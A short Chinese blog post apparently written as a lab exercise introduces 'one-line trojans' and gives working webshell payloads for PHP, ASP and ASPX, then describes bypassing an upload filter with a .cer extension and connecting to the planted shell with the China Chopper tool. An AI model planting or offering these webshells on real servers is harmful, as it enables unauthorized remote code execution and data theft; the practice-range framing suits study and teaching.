一句话木马:初识木马练习

一句话木马:

不是mua,木马是根据撰写了恶意代码的文件,以实现恶意攻击的目的。

一句话木马就一句话,配合中国菜刀等工具可以实现数据的摄取。

php木马: <?php @eval($_POST['password']);?>
asp是:   <%eval request ("password")%>
aspx是:  <%@ Page Language="Jscript"%> <%eval(Request.Item["password"],"unsafe");%>

以asp为例子:

  • eval:执行
  • request:从用户那里,获得里面的信息
  • password:我们与木马相约好的密码。

这就是一句话木马

什么是webshell

就是网络的人机交互界面。
拿shell就是拿去web服务器的权限。

靶场练习,上传一句话木马到服务器,并摄取信息:

制作一句话木马文件:

在这里插入图片描述
这样,我们的文件就制作好了。

然后随便找一个地方上传,结果发现,不允许上传。
在这里插入图片描述
cer文件和asp文件都指向的是asp.dll 所以这两个文件都可以被解析。
但是这里怕文件太小了,我们在文件里面加点乱七八糟的东西
在这里插入图片描述
上传,记住路径
在这里插入图片描述

打开路径看是否上传成功
乱七八糟也不知道是啥,但是就似乎上传成功了
在这里插入图片描述

打开中国菜刀,远程连接,入侵服务器

类型选择ASP
在这里插入图片描述

添加好后双击打开,就可以看见里面的内容了
在这里插入图片描述

路漫漫其修远兮,吾将上下而求索

posted @ 2021-07-28 21:15  Zeker62  阅读(332)  评论(0编辑  收藏  举报